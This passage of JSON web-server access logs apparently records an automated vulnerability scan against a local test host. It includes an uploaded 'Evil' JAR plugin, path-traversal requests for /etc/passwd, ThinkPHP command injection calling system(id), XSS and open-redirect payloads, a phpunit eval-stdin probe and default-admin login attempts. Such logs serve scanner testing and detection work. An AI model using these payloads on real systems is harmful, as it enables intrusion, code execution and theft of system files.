application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/latest HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"{\x0D\x0A \x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A29K6BfLpGAtYIWJwz9cMyvotgTf\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@29K6BfLpGAtYIWJwz9cMyvotgTf.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 